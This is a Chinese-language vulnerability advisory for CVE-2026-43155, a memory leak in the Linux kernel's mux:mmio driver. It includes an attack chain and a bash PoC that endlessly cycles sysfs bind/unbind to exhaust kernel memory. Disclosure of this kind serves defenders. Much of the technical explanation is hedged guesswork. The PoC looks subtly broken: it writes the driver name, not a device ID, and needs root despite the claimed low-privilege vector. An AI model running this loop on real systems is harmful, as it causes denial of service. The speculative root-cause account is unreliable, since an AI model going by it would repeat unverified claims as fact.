CVE-2026-43155 CVSS 5.5 中危

CVE-2026-43155 Linux内核mux:mmio内存泄漏漏洞

披露日期: 2026-05-06

来源: 416baaa9-dc9f-4396-8d5f-8c081fb06d67

漏洞信息

漏洞编号

CVE-2026-43155

漏洞类型

内存泄漏

CVSS评分

5.5 中危

攻击向量

本地 (AV:L)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

Linux Kernel

漏洞概述

Linux内核中的`mux:mmio`驱动组件存在一个内存泄漏漏洞。该问题的根本原因在于驱动程序探测（probe）过程中分配的`mmio regmap`资源未得到妥善管理。当探测操作失败（例如由于硬件依赖导致的探测延迟）或驱动程序解绑时，已分配的内存未能被释放。本地低权限攻击者可利用此缺陷，通过特定的操作触发该资源泄漏路径，长期运行可能导致系统内存耗尽，进而造成拒绝服务（DoS），严重影响系统可用性。

技术细节

该漏洞发生在Linux内核的`drivers/mux/mmio.c`驱动文件中。`regmap`是Linux内核用于抽象寄存器访问的框架。在驱动的`probe`函数中，代码调用`devm_regmap_init_mmio`或类似的函数分配并初始化一个regmap结构体。然而，原始代码路径可能没有使用设备管理资源（devm），或者错误处理逻辑存在缺陷，导致在`probe`函数返回错误之前，没有手动释放已分配的regmap内存。

当探测失败时（例如`mux_control_alloc`失败或后续初始化出错），驱动卸载流程可能不会执行清理操作，或者执行顺序错误。攻击者可以通过反复加载和卸载受影响的驱动模块，或者在支持热插拔的系统中反复触发硬件探测动作，每次失败都会泄漏一定数量的内核内存。由于内核内存空间有限，持续的泄漏最终会耗尽系统内存，导致系统崩溃或无法为其他进程分配资源，从而实现本地拒绝服务攻击。

攻击链分析

STEP 1

侦察

攻击者确认目标系统运行了包含漏洞的Linux内核版本，并加载了mux:mmio驱动。

STEP 2

访问

攻击者获取本地低权限访问权限（AV:L, PR:L）。

STEP 3

利用

攻击者通过脚本或程序反复触发驱动的bind/unbind操作，或加载/卸载模块，导致probe函数反复执行并失败。

STEP 4

影响

由于每次probe失败都会泄漏regmap内存，持续操作最终耗尽内核内存，导致系统崩溃或拒绝服务（A:H）。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

#!/bin/bash
# PoC script to trigger memory leak in mux:mmio driver
# This script attempts to repeatedly bind and unbind the driver
# to simulate probe failures and exhaustion of kernel memory.

DRIVER_NAME="mux-mmio"
SYSFS_PATH="/sys/bus/platform/drivers/$DRIVER_NAME"

# Check if driver exists
if [ ! -d "$SYSFS_PATH" ]; then
    echo "[!] Driver $DRIVER_NAME not found in $SYSFS_PATH"
    echo "[!] This PoC requires the vulnerable driver to be loaded."
    exit 1
fi

echo "[*] Starting PoC for CVE-2026-43155..."
echo "[*] Attempting to trigger memory leak via bind/unbind cycles..."

COUNT=0
while true; do
    # Try to unbind (may fail if not bound, ignore error)
    echo "$DRIVER_NAME" > "$SYSFS_PATH/unbind" 2>/dev/null
    
    # Try to bind (this triggers the probe function)
    # If probe fails due to missing hardware or config, memory may leak
    echo "$DRIVER_NAME" > "$SYSFS_PATH/bind" 2>/dev/null
    
    ((COUNT++))
    if [ $((COUNT % 100)) -eq 0 ]; then
        echo "[*] Cycles completed: $COUNT"
        # Monitor slab info for kmalloc-XX increases (optional)
    fi
done

影响范围

Linux Kernel < commit 3c4ae63073d84abee5d81ce46d86a94e9dae9c89

Linux Kernel < commit 76096f156fe9dc9fbd6e4618088706e91b9b0a6c

Linux Kernel < commit cbde3c109d52564ae2c12e514c33c44345e84b2c

防御指南

临时缓解措施

对于受影响的系统，可以通过禁用mux:mmio驱动模块来暂时缓解风险，如果系统硬件不依赖于该多路复用控制器。同时，应严格控制系统本地访问权限，防止恶意用户进行反复的探测操作。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表